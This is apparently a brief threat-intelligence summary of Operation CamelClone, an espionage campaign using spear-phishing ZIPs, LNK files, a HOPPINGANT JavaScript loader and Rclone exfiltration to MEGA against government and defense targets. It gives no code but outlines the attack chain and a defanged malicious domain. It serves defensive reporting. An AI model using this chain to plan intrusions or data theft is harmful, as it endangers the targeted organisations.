Operation CamelClone: Multi-Region Espionage Campaign Targets Government and Defense Entities Amidst Regional Tensions
Seqrite Labs tracked Operation CamelClone, a coordinated campaign that uses spear-phishing ZIP attachments containing malicious LNK files to download a JavaScript loader dubbed HOPPINGANT from filebulldogs[.]com, which ultimately deploys Rclone (l.exe) to exfiltrate documents to MEGA. Targets span government, defense, diplomatic, and energy sectors in Algeria, Mongolia, Ukraine, and Kuwait, with decoys impersonating entities such as the Algerian Ministry of Housing, MonAtom LLC, and the Kuwaiti Armed Forces. #HOPPINGANT #filebulldogs #Rclone #MEGA #MonAtom
Operation CamelClone targets government, defense, and energy sectors in Algeria, Mongolia, Ukraine, and Kuwait using spear-phishing ZIPs with LNK files to deploy HOPPINGANT and exfiltrate data via Rclone to MEGA. #HOPPINGANT #Algeria #Espionage
